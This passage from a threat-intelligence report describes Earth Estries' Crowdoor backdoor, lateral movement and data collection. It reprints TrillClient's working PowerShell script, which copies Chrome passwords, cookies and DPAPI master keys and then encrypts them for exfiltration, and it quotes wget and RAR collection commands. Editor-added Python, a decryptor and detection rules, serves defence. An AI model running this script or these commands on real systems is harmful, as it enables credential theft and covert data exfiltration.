Breaking Down Earth Estries’ Persistent TTPs in Prolonged Cyber Operations
Crowdoor performs different actions depending on the argument it is launched with. Table 1 summarizes the behaviors exhibited by the new Crowdoor variant for each argument. Overall, the behaviors match those of the older variant; the differences are the process used for injection (msiexec.exe) and the command IDs (shown in table 2).
Arguments | Action |
---|---|
No argument | Persistence is set through the registry Run key or a service, and the backdoor is restarted |
0 | Persistence is set through the registry Run key or a service, and the backdoor is restarted |
1 | The backdoor is restarted by injecting into msiexec.exe |
2 | The backdoor's main function is called |
Table 1. List of arguments and their corresponding actions
Old Crowdoor variant | New Crowdoor variant | Functions |
---|---|---|
0x2347135 | 0x11736212 | Initial connection C2 |
0x2347136 | 0x11736213 | Collect computer name, username, OS version, and hostname or IP information |
0x2347137 | 0x11736214 | Remote shell |
0x234713B | 0x11736218 | Delete malware files, persistence and exit |
0x2347140 | 0x1173621D | File-related operations |
0x2347141 | 0x1173621E | Open/ReadFile |
0x2347142 | 0x1173621F | Open/WriteFile |
0x2347144 | 0x11736221 | Collect drive information |
0x2347145 | 0x11736222 | Search File |
0x2347148 | 0x11736225 | CreateDirectory |
0x2347149 | 0x11736226 | Rename file or directory |
0x234714A | 0x11736227 | Delete file or Directory |
0x234714A | 0x11736228 | Communication with C&C server |
Table 2. Comparison between old and new Crowdoor variants
Package 1 | Package 2 | Package 3 | Package 4 |
---|---|---|---|
WinStore.exe (Host) | K7Sysmon.exe (Host) | HxTsk.exe (Host) | MsMsRng.exe (Host) |
Sqlite3.dll | K7Sysmn1.dll | d3d8.dll | sqlite3.dll |
datastate.dll | K7Sysmn2.dll | HxTsk (encrypted) | msimg32.dll |
datast.dll | K7Sysmn3.dll | datastate.dll | |
WinStore (encrypted) | K7Sysmon.dll (encrypted) | | MsMsRng (encrypted) |
Table 3. Crowdoor packages
Lateral Movement
Earth Estries uses PsExec to install its backdoors and tools laterally, notably by copying the CAB files containing the backdoors or tools together with a batch file that performs the installation, sets up persistence, and executes the tools.
Typically, PsExec is used to copy the CAB file containing the malware to be installed laterally. However, in some instances WMIC is used in its place to achieve similar results. A set of batch files is then copied and executed to extract, install, and run the malware. Large-scale collection may also be carried out with batch files.
In later stages of the attack, the backdoors themselves may be used to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files still handle the extraction, installation, and execution of those tools. This sometimes includes creating persistence mechanisms for the batch file, which then acts as an indirect persistence mechanism for the actual backdoors.
Discovery, collection and exfiltration
TrillClient’s user credential discovery
Earth Estries collects user credentials that can be used to further its objectives. The threat actor employs the TrillClient information stealer for this routine, primarily harvesting credentials from browser user profiles. TrillClient launches a PowerShell script that copies the relevant profile files to a staging location. Note that the script also takes each user's DPAPI master key folder (%APPDATA%\Microsoft\Protect), which an attacker needs, together with the user's logon credentials, to decrypt offline the Chrome encryption key stored in Local State and, with it, the saved passwords and cookies:

```powershell
foreach($win_user_path in $users_path){
    # DPAPI master keys for the user; "D" answers xcopy's file-or-directory prompt
    echo D | xcopy "C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\" "$copy_dest_path\$win_user_path\Protect\" /E /C /H;
    # strip archive, system, read-only and hidden attributes from the copied tree
    attrib -a -s -r -h "$copy_dest_path\$win_user_path\*" /S /D;
    # Chrome "Local State" holds the DPAPI-protected key that encrypts Login Data and Cookies; "F" answers the prompt as a file
    echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State" "$copy_dest_path\$win_user_path\Local State" /C;
    echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" "$copy_dest_path\$win_user_path\Default\Network\Cookies" /C;
    echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data" "$copy_dest_path\$win_user_path\Default\Login Data" /C;
    # repeat for every additional Chrome profile directory ("Profile 1", "Profile 2", ...)
    $profile_path = Get-ChildItem -Name "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\" -Include *Profile* -ErrorAction SilentlyContinue;
    foreach($chrome_user_path in $profile_path){
        echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Network\Cookies" "$copy_dest_path\$win_user_path\$chrome_user_path\Network\Cookies" /C;
        echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\$chrome_user_path\Login Data" "$copy_dest_path\$win_user_path\$chrome_user_path\Login Data" /C;
    }
}
```
Data is collected from the following files and folders:
- %LOCALAPPDATA%\Google\Chrome\User Data\Local State
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Login Data
- %LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Network\Cookies
- %APPDATA%\Microsoft\Protect\*
The collected data is first copied to <%TEMP%\browser_temp_data<RANDOM>>, then packed with the tar command and encrypted with a simple position-dependent XOR: byte i of the archive is XORed with (i mod 252) and with (0xe6 - (i mod 199)). The plaintext staging directory is deleted once the archive has been read into memory.

```powershell
# pack the staging directory, read the archive back, then remove the plaintext copy
tar -cvf "$copy_dest_path\tar" $copy_dest_path;
$e_a = [System.IO.File]::ReadAllBytes("$copy_dest_path\tar");Remove-Item -Path $copy_dest_path -Recurse;
# position-dependent XOR: the key byte for offset i is (i % 252) XOR (0xe6 - (i % 199))
$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 - ($e_i % 199)));$e_i += 1;}
# despite the variable name, the output file name is hardcoded
$random_filename = "300775736611547784207972935122149919289871693";
$out_put_file = $out_put_path + "\" + $random_filename;
echo $out_put_file;
[System.IO.File]::WriteAllBytes($out_put_file, $e_a);
```
The encrypted archive is then sent to the threat actor's Gmail account over Simple Mail Transfer Protocol (SMTP).
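Because the XOR step is symmetric, the same transform recovers the tar archive from a captured exfiltration file. The following Python is an added example (not TrillClient's code and not part of the original post) that reimplements the key stream exactly as the script computes it, builds a constructed stand-in for the staged browser data, round-trips it, and checks for the tar magic before trusting the result; the function names and the sample archive contents are the editor's own.

```python
import io
import tarfile


def trillclient_keystream(length: int) -> bytes:
    """Key byte for offset i is (i % 252) XOR (0xE6 - (i % 199)), as in the PowerShell script.

    0xE6 - (i % 199) stays in 32..230, so every key byte fits in one byte."""
    return bytes(((i % 252) ^ (0xE6 - (i % 199))) for i in range(length))


def trillclient_xor(data: bytes) -> bytes:
    """Apply TrillClient's position-dependent XOR. XOR is its own inverse,
    so one function both encrypts a tar archive and decrypts a captured blob."""
    return bytes(b ^ k for b, k in zip(data, trillclient_keystream(len(data))))


def looks_like_tar(data: bytes) -> bool:
    """POSIX/GNU tar archives carry the magic string "ustar" at offset 257 of the first header."""
    return len(data) >= 262 and data[257:262] == b"ustar"


def build_sample_archive() -> bytes:
    """Constructed stand-in for the staged browser_temp_data tree (no real victim data).

    The member names mirror the layout the script produces: <user>\\Local State and
    <user>\\<profile>\\Login Data, written with forward slashes as tar stores them."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        members = (
            ("user1/Local State", b'{"os_crypt": {"encrypted_key": "..."}}'),  # constructed
            ("user1/Default/Login Data", b"SQLite format 3\x00"),               # constructed
        )
        for name, payload in members:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def recover_archive(blob: bytes) -> list[str]:
    """Decrypt a captured exfiltration file and return the member names.

    The tar-magic check guards against applying the wrong key to a sample from a
    variant that uses a different scheme, instead of silently producing garbage."""
    plain = trillclient_xor(blob)
    if not looks_like_tar(plain):
        raise ValueError("decrypted data is not a tar archive; wrong sample or different variant")
    with tarfile.open(fileobj=io.BytesIO(plain), mode="r") as tar:
        return tar.getnames()


if __name__ == "__main__":
    captured = trillclient_xor(build_sample_archive())   # what the SMTP attachment would hold
    print(recover_archive(captured))
```

On a real sample, feed the bytes of the hardcoded-name output file to recover_archive; if the check fails, compare the first 512 decrypted bytes against a tar header layout before assuming the key stream has changed.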
Collection of sensitive documents
Earth Estries uses RAR to archive the information of interest. In this attack scenario, the actor used wget to download target documents from an internal web-based document management platform into a collection folder before archiving them.
- A batch file containing commands to download PDF files into the collection directory is executed; the document names are hardcoded (-c resumes partial downloads, -P sets the output directory):
- c:\users\public\music\temp\wget.exe -c "hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf" -P c:\users\public\music\temp
- Afterwards, the collected PDFs are archived with RAR at maximum compression (-m5):
- C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf
Collection via backdoor
Earth Estries uses both its Crowdoor and Cobalt Strike installations for collection routines, archiving information of interest from both local and remote locations. Some examples of the collection commands observed are as follows:
Example command | Functions |
---|---|
rar.exe a -m5 <install path>\322.rar \\<remote machine>\c$\<remote path> | Gather information already collected by an older generation of the infection on a remote machine, reached over its administrative share |
rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History" | Collect browser history files, which are of interest to the attackers as a route to compromising more credentials |
rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date> | Collect the more recent files and documents a local user has interacted with (-r recurses, -y answers all prompts, -ta keeps only files modified after the cutoff date) |
Table 4. Collection commands
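To turn the lateral-movement tradecraft described earlier in this section (PsExec, and occasionally WMIC, staging CAB and batch files) and the collection commands above (wget pulls from an internal host into the Public\Music staging folder, and the RAR invocations in table 4) into something a detection engineer can test, here is an added Python example that is not from the original post. It runs a handful of pattern rules over constructed process command lines modeled on the ones quoted in the text. The rule names, the regular expressions, the sample host names, user names, IP addresses and dates, and the assumption that a WMIC invocation would reference the same .cab/.bat files are all the editor's own.

```python
import re

# Pattern rules written from the TTPs described on this page. The regexes and
# rule names are the editor's assumptions, meant as a starting point for tuning
# against real process-creation telemetry (e.g. Sysmon event 1 or Windows 4688
# with command-line logging enabled), not a vendor signature.
RULES = [
    # PsExec (or, per the text, occasionally WMIC) referencing a staged CAB or batch file
    ("psexec_wmic_cab_bat", re.compile(r"\b(psexec|wmic)(\.exe)?\b.*\.(cab|bat)\b", re.I)),
    # wget pulling from an RFC 1918 host into a collection directory (-P); hxxp accepted for defanged logs
    ("wget_internal_collection", re.compile(
        r"\bwget(\.exe)?\b.*h(xx|tt)ps?://(10\.|172\.(1[6-9]|2\d|3[01])\.|192\.168\.)\S*\s.*-P\s+\S+", re.I)),
    # rar.exe launched from the C:\Users\Public staging area used in this campaign
    ("rar_run_from_public_staging", re.compile(r"C:\\Users\\Public\\[^\s]*\brar\.exe\s+a\b", re.I)),
    # rar archiving a remote administrative share (\\host\c$\...)
    ("rar_remote_admin_share", re.compile(r"\brar(\.exe)?\s+a\b.*\\\\[^\\\s]+\\[a-z]\$\\", re.I)),
    # rar archiving Chrome credential, cookie or history artifacts
    ("rar_browser_artifacts", re.compile(r"\brar(\.exe)?\s+a\b.*(Login Data|Cookies|History)\b", re.I)),
    # rar with -ta<date>: only files modified after a cutoff, i.e. recent documents
    ("rar_recent_user_files", re.compile(r"\brar(\.exe)?\s+a\b.*\s-ta\d{8}\b", re.I)),
]


def rules_for(command_line: str) -> list[str]:
    """Names of every rule that fires on one process command line, in RULES order."""
    return [name for name, pat in RULES if pat.search(command_line)]


def scan(command_lines: list[str]) -> list[tuple[int, str]]:
    """(line index, rule name) pairs for every hit across a batch of command lines."""
    return [(i, name) for i, cmd in enumerate(command_lines) for name in rules_for(cmd)]


# Constructed sample command lines (hosts, users, IPs and dates are made up), modeled on
# the commands quoted in this section; the last three are benign controls that must not fire.
SAMPLE = [
    r'psexec.exe \\10.0.0.5 -c C:\Users\Public\Music\install.bat',
    r'c:\users\public\music\temp\wget.exe -c "hxxp://172.16.1.20/docs/report.pdf" -P c:\users\public\music\temp',
    r'C:\Windows\system32\cmd.exe /C C:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp\*.pdf',
    r'rar.exe a -m5 C:\Users\Public\Music\322.rar \\FILESRV01\c$\Users\Public\Music\*',
    r'rar.exe a -m5 C:\Users\Public\Music\his231.rar "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\History"',
    r'rar.exe a C:\Users\Public\Music\0311.rar C:\users\jdoe\Desktop\* C:\users\jdoe\Downloads\* C:\users\jdoe\Documents\* -r -y -ta20240301',
    r'rar.exe a -m5 D:\Backups\projects.rar D:\Projects\*',
    r'psexec \\10.0.0.7 -s cmd.exe /c ipconfig /all',
    r'wget https://example.org/tools/file.zip',
]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE):
        print(f"{rule:28s} {SAMPLE[idx]}")
```

The benign controls matter as much as the hits: plain PsExec administration and RAR backups to a local drive are common in enterprises, so each rule keys on the combination the report describes (staging folder, admin share, browser artifact paths, -ta cutoff) rather than on the tool name alone.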
Telemetry suggests that the archives were exfiltrated through the same channels used to run the collection commands: either the command-and-control (C&C) channels of the backdoors, or the initial access method used to control these tools.
An overview of the second Earth Estries attack flow is shown in figure 3: